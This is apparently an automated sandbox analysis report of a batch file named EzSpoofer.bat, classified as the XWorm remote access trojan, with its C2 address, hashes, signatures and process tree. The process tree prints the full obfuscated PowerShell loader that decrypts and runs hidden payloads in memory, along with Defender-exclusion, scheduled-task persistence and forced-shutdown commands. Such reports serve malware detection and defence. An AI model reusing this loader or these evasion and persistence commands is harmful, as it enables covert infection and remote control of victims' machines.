Analysis

  • max time kernel
    120s
  • max time network
    119s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-01-2025 18:23

General

  • Target

    EzSpoofer.bat

  • Size

    290KB

  • MD5

    cac585a686a51452504600d4fcf1f7b3

  • SHA1

    cff487749ee57d6a6228622776392fa80d85041e

  • SHA256

    876279d2efe790bf2e60a1d6bae02b08228a485d208151a5b1278e2fd11e2369

  • SHA512

    0364f3e26c03ad92ac447aa446304dd7da7a46916ae62e70380529177416964b543da4df08e0e46221f57196513a062cc46eb80d02f2c52ea2c0cd7989e1aea9

  • SSDEEP

    6144:ikknMyCyb4UpNDYSBObHBnWxp/3f8ZWftYQcuKPprtHnnWd:iOib449YFFnYf9xcbrNnq

Malware Config

Extracted

Family

xworm

C2

IDKTOBEHONESTNIGAS-56344.portmap.io:56344

Attributes
  • Install_directory

    %ProgramData%

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 7 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\EzSpoofer.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2372
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LzMyn9z48x0Q4gbuWdOuMvyklX2ZjqkWkuihkCRVIvQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pe5tId8jJVo1uZ0oyFBZYg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YAedb=New-Object System.IO.MemoryStream(,$param_var); $lZKKA=New-Object System.IO.MemoryStream; $QbfIR=New-Object System.IO.Compression.GZipStream($YAedb, [IO.Compression.CompressionMode]::Decompress); $QbfIR.CopyTo($lZKKA); $QbfIR.Dispose(); $YAedb.Dispose(); $lZKKA.Dispose(); $lZKKA.ToArray();}function execute_function($param_var,$param2_var){ $YrspZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $otogi=$YrspZ.EntryPoint; $otogi.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\EzSpoofer.bat';$EprqD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\EzSpoofer.bat').Split([Environment]::NewLine);foreach ($hFcVg in $EprqD) { if ($hFcVg.StartsWith(':: ')) { $ccxXr=$hFcVg.Substring(3); break; }}$payloads_var=[string[]]$ccxXr.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3500
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_880_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_880.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1168
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_880.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:4300
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_880.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2840
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LzMyn9z48x0Q4gbuWdOuMvyklX2ZjqkWkuihkCRVIvQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pe5tId8jJVo1uZ0oyFBZYg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YAedb=New-Object System.IO.MemoryStream(,$param_var); $lZKKA=New-Object System.IO.MemoryStream; $QbfIR=New-Object System.IO.Compression.GZipStream($YAedb, [IO.Compression.CompressionMode]::Decompress); $QbfIR.CopyTo($lZKKA); $QbfIR.Dispose(); $YAedb.Dispose(); $lZKKA.Dispose(); $lZKKA.ToArray();}function execute_function($param_var,$param2_var){ $YrspZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $otogi=$YrspZ.EntryPoint; $otogi.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_880.bat';$EprqD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_880.bat').Split([Environment]::NewLine);foreach ($hFcVg in $EprqD) { if ($hFcVg.StartsWith(':: ')) { $ccxXr=$hFcVg.Substring(3); break; }}$payloads_var=[string[]]$ccxXr.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops startup file
            • Adds Run key to start application
            • Checks processor information in registry
            • Enumerates system info in registry
            • Suspicious behavior: EnumeratesProcesses
            PID:2548
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:1372
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4456
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4000
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "powershell" /tr "C:\ProgramData\powershell.exe"
              6⤵
              • Scheduled Task/Job: Scheduled Task
              PID:3740
            • C:\Windows\SYSTEM32\shutdown.exe
              shutdown.exe /f /s /t 0
              6⤵
                PID:2420
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
      1⤵
      • Enumerates system info in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:3652
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff8562646f8,0x7ff856264708,0x7ff856264718
        2⤵
          PID:3044
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2
          2⤵
            PID:624
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:3660
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2816 /prefetch:8
            2⤵
              PID:2232
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
              2⤵
                PID:1940
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
                2⤵
                  PID:3344
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4828 /prefetch:1
                  2⤵
                    PID:2328
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4876 /prefetch:1
                    2⤵
                      PID:4740
                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5068 /prefetch:8
                      2⤵
                        PID:5060
                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5068 /prefetch:8
                        2⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:828
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:1
                        2⤵
                          PID:4292
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5504 /prefetch:1
                          2⤵
                            PID:1940
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5024 /prefetch:1
                            2⤵
                              PID:5104
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1
                              2⤵
                                PID:2628
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4876 /prefetch:1
                                2⤵
                                  PID:4316
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5808 /prefetch:1
                                  2⤵
                                    PID:3028
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4676 /prefetch:1
                                    2⤵
                                      PID:3500
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4920 /prefetch:8
                                      2⤵
                                        PID:4500
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6064 /prefetch:8
                                        2⤵
                                          PID:4352
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6124 /prefetch:1
                                          2⤵
                                            PID:1048
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:1
                                            2⤵
                                              PID:3064
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6300 /prefetch:1
                                              2⤵
                                                PID:3456
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1
                                                2⤵
                                                  PID:2112
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6336 /prefetch:1
                                                  2⤵
                                                    PID:6092
                                                • C:\Windows\System32\CompPkgSrv.exe
                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                  1⤵
                                                    PID:2212
                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                    1⤵
                                                      PID:4652
                                                    • C:\Windows\system32\AUDIODG.EXE
                                                      C:\Windows\system32\AUDIODG.EXE 0x384 0x2c4
                                                      1⤵
                                                        PID:2096
                                                      • C:\Windows\System32\CompPkgSrv.exe
                                                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                        1⤵
                                                          PID:2112
                                                        • C:\ProgramData\powershell.exe
                                                          C:\ProgramData\powershell.exe
                                                          1⤵
                                                          • Executes dropped EXE
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:5208
                                                        • C:\Windows\system32\taskmgr.exe
                                                          "C:\Windows\system32\taskmgr.exe" /4
                                                          1⤵
                                                          • Checks SCSI registry key(s)
                                                          • Checks processor information in registry
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of FindShellTrayWindow
                                                          • Suspicious use of SendNotifyMessage
                                                          PID:1624
                                                        • C:\ProgramData\powershell.exe
                                                          C:\ProgramData\powershell.exe
                                                          1⤵
                                                          • Executes dropped EXE
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:5284
                                                        • C:\Windows\system32\LogonUI.exe
                                                          "LogonUI.exe" /flags:0x4 /state0:0xa3912055 /state1:0x41c64e6d
                                                          1⤵
                                                          • Modifies data under HKEY_USERS
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:5992

                                                        Network

                                                        MITRE ATT&CK Enterprise v15

                                                        Replay Monitor

                                                        Loading Replay Monitor...

                                                        Downloads

                                                        • C:\ProgramData\powershell.exe

                                                          Filesize

                                                          442KB

                                                          MD5

                                                          04029e121a0cfa5991749937dd22a1d9

                                                          SHA1

                                                          f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                                                          SHA256

                                                          9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                                                          SHA512

                                                          6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                          Filesize

                                                          3KB

                                                          MD5

                                                          661739d384d9dfd807a089721202900b

                                                          SHA1

                                                          5b2c5d6a7122b4ce849dc98e79a7713038feac55

                                                          SHA256

                                                          70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

                                                          SHA512

                                                          81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                          Filesize

                                                          152B

                                                          MD5

                                                          f426165d1e5f7df1b7a3758c306cd4ae

                                                          SHA1

                                                          59ef728fbbb5c4197600f61daec48556fec651c1

                                                          SHA256

                                                          b68dfc21866d0abe5c75d70acc54670421fa9b26baf98af852768676a901b841

                                                          SHA512

                                                          8d437fcb85acb0705bf080141e7a021740901248985a76299ea8c43e46ad78fb88c738322cf302f6a550caa5e79d85b36827e9b329b1094521b17cf638c015b6

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                          Filesize

                                                          152B

                                                          MD5

                                                          6960857d16aadfa79d36df8ebbf0e423

                                                          SHA1

                                                          e1db43bd478274366621a8c6497e270d46c6ed4f

                                                          SHA256

                                                          f40b812ce44e391423eb66602ac0af138a1e948aa8c4116045fef671ef21cd32

                                                          SHA512

                                                          6deb2a63055a643759dd0ae125fb2f68ec04a443dbf8b066a812b42352bbcfa4517382ed0910c190c986a864559c3453c772e153ee2e9432fb2de2e1e49ca7fe

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                          Filesize

                                                          1KB

                                                          MD5

                                                          c836078621f7f7a298fa14f142ab07b5

                                                          SHA1

                                                          1aa8ded64eac1c61e502454635f43f98e74588ec

                                                          SHA256

                                                          3faf50549990c54f8b49f6c20200ee5c1b4a5e6cf0571dec94d7e62ed12ecde3

                                                          SHA512

                                                          f5ee002e9504fce58e4febbed28add1fa9d74481d59c10e64c709998ada79d0e8c73732ef1c846a6b9ff5388778cfc386b64f34ccd3f9d787de3f991a790f436

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                          Filesize

                                                          2KB

                                                          MD5

                                                          0a1b2807c4e257dd00d33ba25c29bf9c

                                                          SHA1

                                                          fb057c43a86daa81e41902a97be7e4a3cbe9a50d

                                                          SHA256

                                                          497d962bee61f238039ded61a14b4e5d5e887e9ad746920e26bb848163e544e0

                                                          SHA512

                                                          9d6a8cd57315d49b463ce380c84d33397e816005e244fe36d279cb2caabffe7014b6f345e6f05c492a55ff339d7925e8f2e491ddafc049bfac1d7d6a57dcb462

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                          Filesize

                                                          6KB

                                                          MD5

                                                          b85fc97baca05bf0ef948e739fa1324b

                                                          SHA1

                                                          635bb1174270025e2ec72ddb510cc71e5978118c

                                                          SHA256

                                                          eb26d6eeb6094073ea6d81bd3d4591112a6bd7ad7a879fa9f81a1b9eb4b05eea

                                                          SHA512

                                                          69f8dc5cf186c9d8ee721a19b2e4db1bba18c918f73b3f78a648042130c50369b5faf34cb4765bce812b95be7af04cc62c0f54b243b5991ae7fb9f24bb5fb44d

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                          Filesize

                                                          5KB

                                                          MD5

                                                          19db93403213e5c94c4e3a8c73c6c1e9

                                                          SHA1

                                                          746252e56588a27ccff23cb3a3b84015d4d20bab

                                                          SHA256

                                                          5793472cea2d4a9c4e076d5c5e4fa60a8cc89aacf29838d9b5ed402b758be31d

                                                          SHA512

                                                          7f0d2556e391cd1367960e21ff3f5fbdd7cb351c36154b9061cec981516a3628fcc88dd76560b4ed27c9b8f3f889caf1d89ebba5111609d2181675d75a445d20

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                          Filesize

                                                          6KB

                                                          MD5

                                                          0b0634010f04693989ddb8b22cad4cba

                                                          SHA1

                                                          431b3fb19f80f600d6880bb92038101a38d61fe5

                                                          SHA256

                                                          d25dc7c716e0b083b5b3f61d17f5461d11baf513ff03e786141edfe095dcff2f

                                                          SHA512

                                                          a108ab6929ea8f3df96e9c8d79c9544d5c187aebdd4b48442e45d15a572c3ba88839ed5640f1dac23ea5ed1be72168a9d137c55dc96dfc657e39c63e1c99ad81

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\f239b7ab-e454-48c3-976a-e371b41a6bdb\index-dir\the-real-index

                                                          Filesize

                                                          2KB

                                                          MD5

                                                          25aa0d1a36080ee27818e5c8071bd7c1

                                                          SHA1

                                                          b65ff7268b5ec4270f6a07329ff30340e43432d0

                                                          SHA256

                                                          fa3dbf44f64fceb8dcc1797e78bddbf31e5fd404636f9b6873f8ce8ed7e4f297

                                                          SHA512

